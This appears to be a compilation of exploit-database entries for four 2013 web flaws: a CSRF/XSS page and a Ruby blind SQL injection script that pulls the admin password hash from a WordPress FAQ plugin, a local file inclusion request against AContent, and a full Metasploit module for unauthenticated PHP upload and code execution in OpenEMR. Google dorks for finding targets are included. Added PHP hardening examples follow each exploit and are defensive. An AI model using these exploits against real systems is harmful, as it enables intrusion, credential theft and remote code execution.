WordPress IndiaNIC FAQs Manager Plugin 1.0 – Multiple Vulnerabilities

The exploit for the CSRF vulnerability found in version 1.0 of the WordPress IndiaNIC FAQs Manager Plugin is as follows.

 <html> 
 <!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patch (cli)


##############
# Description:
##############
# The IndiaNIC FAQ Settings Page is vulnerable to CSRF.
# The Ask Question area (front-end) is vulnerable to XSS. It is possible to insert <script>alert(1)</script> in the question parameter.
# The Captcha value can be read from the captcha parameter (hidden field).
#



###################################
#### Part of Ask Question form ####
###################################
 <form action="" method="POST" name="iNICfaqsAskForm_1"> 
 <input type="hidden" value="1" name="group_id"> 
 <input type="hidden" value="1" name="from_user"> 
 <input type="hidden" value="inic_faq_questions" name="action"> 
 <input type="hidden" value="5540" name="captcha">     <=================== We don't need the captcha Image when we have this xD


####################################################################
#### Request from Ask Question area (XSS in question parameter) ####
####################################################################
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9001/wordpress/?p=11
Content-Length: 143
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=&question=XSS TEST <script>alert(1)</script> ?&captcha_code=8560

# When an admin navigates to the Question area (back-end), the arbitrary JavaScript executes.



#######################################################################
--> 
         <title> Download </title> 
 <body> 

         <!-- replace "127.0.0.1:9001/wordpress" --> 
         <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST"> 
         <input type="hidden" name="action" value="inic_faq_settings" /> 
         <input type="hidden" name="alert_email_address" value="" /> 
         <input type="hidden" name="capture_email" value="1" /> 
         <input type="hidden" name="notify_when_answered" value="1" /> 
         <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" /> 
         <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" /> 
         <input type="hidden" name="custom_js" value="alert(1234)" /> 
         </form> 
         <script> document.forms[0].submit(); </script> 

 </body> 
 </html> 
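Both findings above come down to the same two omissions in the plugin's admin-ajax handlers: the settings action trusts any POST that carries a logged-in cookie, and the question action trusts its own hidden field for the captcha and stores the question unescaped. The following is an added example of how those handlers look when hardened; it is not the plugin's code. It assumes a WordPress runtime (the `wp_ajax_{action}` hook convention, `check_ajax_referer`, transients, `$wpdb`); the option key `inic_faq_settings`, the nonce field `inic_faq_nonce`, the `captcha_token` field and the table name are illustrative assumptions.

```php
<?php
// Added example, not the plugin's own code. Option key, nonce field name,
// captcha_token field and table name are assumptions for illustration.

// --- Settings page: require a nonce and the manage_options capability ------
add_action('wp_ajax_inic_faq_settings', 'hardened_inic_faq_settings');
function hardened_inic_faq_settings() {
    // The auto-submitting form in the PoC cannot know this nonce, so it dies here.
    check_ajax_referer('inic_faq_settings_action', 'inic_faq_nonce');
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }
    $settings = array(
        'alert_email_address'  => sanitize_email($_POST['alert_email_address'] ?? ''),
        'capture_email'        => empty($_POST['capture_email']) ? 0 : 1,
        'notify_when_answered' => empty($_POST['notify_when_answered']) ? 0 : 1,
        'listing_template'     => wp_kses_post(wp_unslash($_POST['listing_template'] ?? '')),
        'custom_css'           => wp_strip_all_tags(wp_unslash($_POST['custom_css'] ?? '')),
    );
    // The original stores custom_js verbatim and emits it on every page; a
    // setting whose purpose is to inject script is the risk, so it is dropped.
    update_option('inic_faq_settings', $settings);
    wp_send_json_success();
}

// --- Captcha issued server-side: value stays in a transient, token goes to the form
function issue_captcha() {
    $token = wp_generate_password(16, false);
    $value = (string) wp_rand(1000, 9999);
    set_transient('inic_faq_captcha_' . $token, $value, 10 * MINUTE_IN_SECONDS);
    // Only $token is placed in the form; $value is rendered into the image.
    return array('token' => $token, 'value' => $value);
}

// --- Front-end "Ask Question": captcha checked server-side, input sanitised --
add_action('wp_ajax_nopriv_inic_faq_questions', 'hardened_inic_faq_questions');
add_action('wp_ajax_inic_faq_questions', 'hardened_inic_faq_questions');
function hardened_inic_faq_questions() {
    $token    = sanitize_key($_POST['captcha_token'] ?? '');
    $expected = get_transient('inic_faq_captcha_' . $token);
    delete_transient('inic_faq_captcha_' . $token);        // single use
    $given = (string) ($_POST['captcha_code'] ?? '');
    if ($expected === false || !hash_equals((string) $expected, $given)) {
        wp_send_json_error('captcha mismatch', 400);
    }
    $question = wp_strip_all_tags(wp_unslash($_POST['question'] ?? ''));
    $question = mb_substr($question, 0, 2000);
    $group_id = absint($_POST['group_id'] ?? 0);

    // Stored as plain text; every renderer must still escape on output.
    global $wpdb;
    $wpdb->insert(
        $wpdb->prefix . 'inic_faq_questions',
        array('group_id' => $group_id, 'question' => $question),
        array('%d', '%s')
    );
    wp_send_json_success();
}

// --- Back-end listing: escape on output so stored data can never execute ----
function render_question_row(array $row) {
    printf('<tr><td>%d</td><td>%s</td></tr>',
        (int) $row['group_id'], esc_html($row['question']));
}
```

The settings form itself must emit the nonce with `wp_nonce_field('inic_faq_settings_action', 'inic_faq_nonce')`, and the captcha image handler must look the value up by token rather than reading it back from the request; with those two pieces in place neither request in the PoC above succeeds.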

WordPress IndiaNIC FAQs Manager Plugin 1.0 – Blind SQL Injection

A Blind SQL Injection vulnerability has been found in WordPress IndiaNIC FAQs Manager Plugin 1.0; the exploit, together with the vulnerable code where it arises, is below.

# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7 squeeze14 with Suhosin-Patch (cli)

##############
# Description:
##############
# The "order" and "orderby" parameters are vulnerable to SQL Injection
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=inic_faq&orderby=<sqli>
# The PoC takes some time to finish (15 min on my test system).
# I could speed it up with multithreading but I'm too lazy right now


#### Vulnerable code part (wp_list_table.php) ################################################################
#
# function prepare_items() {
#  $this->_column_headers = array($this->_columns, $this->_hidden_columns, $this->_sortable_columns);
#  $sort_order = isset($_GET['order']) ? $_GET['order'] : "ASC";
#  $orderby_column = isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby']} {$sort_order}" : false;
#
#  global $wpdb;
#  if (is_array($this->_sql)) {
#    if ($orderby_column == false) {
#      $data = $this->_sql;
#    } else {
#      $data = $this->_sql;
#      usort($data, array(&$this, 'usort_reorder'));
#    }
#  } else {
#    $data = $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A);
#  }
################################################################################################################
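The defect in `prepare_items()` above is that `$_GET['orderby']` and `$_GET['order']` are interpolated straight into the SQL string; `$wpdb->prepare()` cannot help, because an identifier and a sort direction are not values that can be bound. The fix is an allowlist. The block below is an added example, not the plugin's code: it rebuilds the ORDER BY clause from the columns the table declares sortable and runs stand-alone on the command line; the column names and base query are constructed for the demo.

```php
<?php
// Added example, not the plugin's code: allowlisted replacement for the
// ORDER BY construction in prepare_items(). Column names and the demo
// query are constructed for illustration.

/**
 * Build a safe ORDER BY clause. Returns '' when the requested column is not
 * allowed, so a hostile value degrades to "no ordering" and never reaches MySQL.
 */
function build_order_clause(array $params, array $sortable_columns): string {
    $orderby = isset($params['orderby']) ? (string) $params['orderby'] : '';
    $order   = isset($params['order']) ? strtoupper((string) $params['order']) : 'ASC';

    // Match against the declared column names, never the raw string;
    // strict comparison avoids PHP type juggling surprises.
    if (!in_array($orderby, $sortable_columns, true)) {
        return '';
    }
    // Direction is a two-value enum; anything else falls back to ASC.
    if ($order !== 'ASC' && $order !== 'DESC') {
        $order = 'ASC';
    }
    // Backticks are cosmetic here; the allowlist is what makes this safe.
    return " ORDER BY `" . $orderby . "` " . $order;
}

// Counterpart of the vulnerable prepare_items(): the fixed base query plus
// the validated ordering clause.
function build_list_query(string $sql, array $params, array $sortable): string {
    return $sql . build_order_clause($params, $sortable);
}

// Demo with constructed inputs.
$base     = "SELECT id, question, asked_on FROM wp_inic_faq_questions";
$sortable = ['id', 'question', 'asked_on'];

$cases = [
    'benign'  => ['orderby' => 'asked_on', 'order' => 'desc'],
    'bad dir' => ['orderby' => 'id', 'order' => 'DESC; DROP TABLE x'],
    'hostile' => ['orderby' => '(SELECT 1) --'],
    'missing' => [],
];
foreach ($cases as $label => $params) {
    printf("%-8s => %s\n", $label, build_list_query($base, $params, $sortable));
}
```

In a real `WP_List_Table` subclass the allowlist is simply `array_keys($this->get_sortable_columns())`, so the same function drops in without a separate configuration list.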



#################################
#### Blind SQL Injection PoC ####
#################################
require "net/http"
require "uri"

$target = "" # EDIT ME #
$cookie = "" # EDIT ME # authenticated user session

# Example:
#$target = "http://127.0.0.1:9001/wordpress/"
#$cookie = "wordpress_a6a5d84619ae3f833460b386c064b9e5=admin|1364040545|86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=editor=html; wp-settings-time-1=1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=tony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=tony@bauer.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=http://sucker.de; wordpress_test_cookie=WP Cookie check; wordpress_logged_in_a6a5d84619ae3f833460b386c064b9e5=admin|1364040545|d7053b96adaa95745023b91694bf30ef; PHPSESSID=1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=1"

if $target.eql?("") or $cookie.eql?("")
    puts "\n[!]\tPlease set $target and $cookie variable\n"
    raise
end

$chars = ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
$hash = "$P$"
$i = 0 # chars index
$j = 4 # hash index


def sqli_send()
    sqli = URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$j}, 1)) FROM wp_users WHERE id = 1) = #{$chars[$i].ord}) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables)END) --")
    uri = URI.parse("#{$target}wp-admin/admin.php?page=inic_faq&orderby=#{sqli}")
    http = Net::HTTP.new(uri.host, uri.port)
    #http.set_debug_output($stderr)
    request = Net::HTTP::Get.new(uri.request_uri)
    request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0"
    request["Cookie"] = $cookie
    resp = http.request(request)
    if( resp.code != "200" )
        puts "something is wrong response = #{resp.code}"
        raise
    end
    # With WordPress default settings no SQL error is displayed,
    # but when an error occurs we don't get any result.
    # The PoC searches for "No record found" and assumes there was an error.
    return resp.body().match(/No record found/)
end

def print_status()
    output = "HASH: #{$hash} try #{$chars[$i]}"
    print "\b"*output.length + output
end

while( $hash.length < 34 )
    if( !sqli_send() )
        $hash += $chars[$i]
        $j += 1
        $i = 0
    else
        $i += 1
    end
    print_status()
end
puts "\n[+]\thave a nice day :-)\n"

AContent 1.3 – Local File Inclusion

A Local File Inclusion vulnerability has been found in AContent 1.3; where it arises is shown below.

##########################################
[~] Exploit Title: AContent 1.3 Local File Inclusion
[~] Date: 21-03-2013
[~] Author: DaOne
[~] Vendor Homepage: http://atutor.ca/acontent/
[~] Software Link: https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
[~] Category: webapps/php
[~] Version: 1.3
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################

# Exploit
POST http://localhost/AContent/oauth/lti/common/tool_provider_outcome.php HTTP/1.1

grade=1&key=1&secret=secret&sourcedid=1&submit=Send Grade&url=../../../include/config.inc.php

-end-
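The `url` parameter in the request above is meant to be the LTI consumer's outcome-service endpoint, yet a relative filesystem path is accepted in its place. The defence is to validate it as an absolute http(s) URL against the consumers the installation knows, before it is handed to any include or HTTP client. The function below is an added example, not AContent's code; the function name and the host allowlist are assumptions for illustration, and it runs stand-alone on the command line.

```php
<?php
// Added example, not AContent's code: validation for the outcome "url"
// parameter. Function name and allowlist are assumptions for illustration.

/**
 * Accept only absolute http(s) URLs whose host is a registered LTI consumer.
 * A relative path such as ../../../include/config.inc.php has neither a
 * scheme nor a host and is refused before any file or network access.
 */
function validate_outcome_url(string $url, array $allowed_hosts): ?string {
    if (strlen($url) > 2048 || strpbrk($url, "\r\n\0") !== false) {
        return null;                      // oversized or control characters
    }
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;                      // not an absolute URL at all
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                      // file://, php://, ftp:// and friends
    }
    if (!in_array(strtolower($parts['host']), $allowed_hosts, true)) {
        return null;                      // host must have been registered
    }
    return $url;
}

// Demo with constructed inputs; lms.example.edu stands in for a registered consumer.
$allowed = ['lms.example.edu'];
foreach ([
    'https://lms.example.edu/lti/outcomes',
    '../../../include/config.inc.php',
    'file:///etc/passwd',
    'http://other.example/outcomes',
] as $candidate) {
    $verdict = validate_outcome_url($candidate, $allowed) === null ? 'rejected' : 'accepted';
    printf("%-42s %s\n", $candidate, $verdict);
}
```

Two points of design: the allowlist is keyed on hosts the LTI consumer registered along with its key and secret, so it needs no separate maintenance, and the HTTP client that finally posts the grade should still be pinned to http/https (for curl, `CURLOPT_PROTOCOLS`) so that a redirect cannot reintroduce a file or other scheme after validation.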

OpenEMR PHP File Upload Vulnerability

The Metasploit exploit for the OpenEMR PHP File Upload vulnerability is as follows.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "OpenEMR PHP File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in OpenEMR 4.1.1. By abusing the
        ofc_upload_image.php file from the openflashchart library, a malicious user can
        upload a file to the tmp-upload-images directory without any authentication, which
        results in arbitrary code execution. The module has been tested successfully on
        OpenEMR 4.1.1 over Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '90222' ],
          [ 'BID', '37314' ],
          [ 'EBD', '24492' ],
          [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
          [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['OpenEMR 4.1.1', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 13 2013",
      'DefaultTarget'  => 0))
 
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to OpenEMR', '/openemr'])
        ], self.class)
  end
 
  def check
    uri = target_uri.path
    peer = "#{rhost}:#{rport}"
 
    # Check version
    print_status("#{peer} - Trying to detect installed version")
 
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "interface", "login", "login.php")
    })
 
    if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end
 
    print_status("#{peer} - Version #{version} detected")
 
    if version > "4.1.1"
      return Exploit::CheckCode::Safe
    end
 
    # Check for vulnerable component
    print_status("#{peer} - Trying to detect the vulnerable component")
 
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"),
    })
 
    if res and res.code == 200 and res.body =~ /Saving your image to/
      return Exploit::CheckCode::Detected
    end
 
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    uri = target_uri.path
 
    peer = "#{rhost}:#{rport}"
    payload_name = rand_text_alpha(rand(10) + 5) + '.php'
    my_payload = payload.encoded
 
    print_status("#{peer} - Sending PHP payload (#{payload_name})")
    res = send_request_raw({
      'method'  => 'POST',
      'uri'     => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}",
      'headers' => { "Content-Length" => my_payload.length.to_s },
      'data'    => my_payload
    })
 
    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/
      fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")
    end
 
    register_file_for_cleanup(payload_name)
 
    print_status("#{peer} - Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name),
    })
 
    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either.  Print the status code for debugging purposes.
    if res and res.code != 200
      print_error("#{peer} - Server returned #{res.code.to_s}")
    end
  end
 
end
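The module's `exploit` method shows exactly what the upload endpoint failed to check: no authentication, the filename taken from the `name` query parameter, and the file written into a directory the web server executes PHP from. The block below is an added example, not OpenEMR's or open-flash-chart's code, of the acceptance logic such an endpoint needs; the function name, the allowlist and the destination directory are assumptions for illustration, and it runs stand-alone on the command line.

```php
<?php
// Added example, not OpenEMR's code: acceptance checks for an image-upload
// endpoint. Function name and extension allowlist are assumptions.

/**
 * Decide whether an upload may be written and under which server-side name.
 * Returns null when the upload is refused. The client-supplied name is used
 * for nothing but its extension; the stored name is random.
 */
function accept_image_upload(bool $authenticated, string $client_name, string $data): ?string {
    if (!$authenticated) {
        return null;                 // the original endpoint required no login at all
    }
    $allowed = [
        'png'  => 'image/png',
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'gif'  => 'image/gif',
    ];
    $ext = strtolower(pathinfo(basename($client_name), PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;                 // .php, .phtml, .phar, ... never get this far
    }
    // Trust the bytes, not the name: sniff the MIME type of the body and
    // require it to match the extension's type exactly.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->buffer($data) !== $allowed[$ext]) {
        return null;
    }
    // Server-chosen random name: the client controls neither path nor extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Demo with constructed inputs: a 1x1 transparent PNG and a PHP stub.
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
$php = "<?php echo 'x';";
$cases = [
    ['auth' => true,  'name' => 'chart.png',     'data' => $png],
    ['auth' => false, 'name' => 'chart.png',     'data' => $png],  // anonymous
    ['auth' => true,  'name' => 'stub.php',      'data' => $php],  // bad extension
    ['auth' => true,  'name' => 'stub.png',      'data' => $php],  // bad bytes
    ['auth' => true,  'name' => 'stub.php.jpg',  'data' => $php],  // bad bytes again
];
foreach ($cases as $c) {
    $result = accept_image_upload($c['auth'], $c['name'], $c['data']);
    printf("%-4s %-14s -> %s\n", $c['auth'] ? 'auth' : 'anon', $c['name'], $result ?? 'rejected');
}
```

The returned name should be written under a directory outside the document root, or one where the server has script execution disabled, and served back through a handler that sets the Content-Type itself; with that in place even a file that passed every check above is only ever bytes, never code.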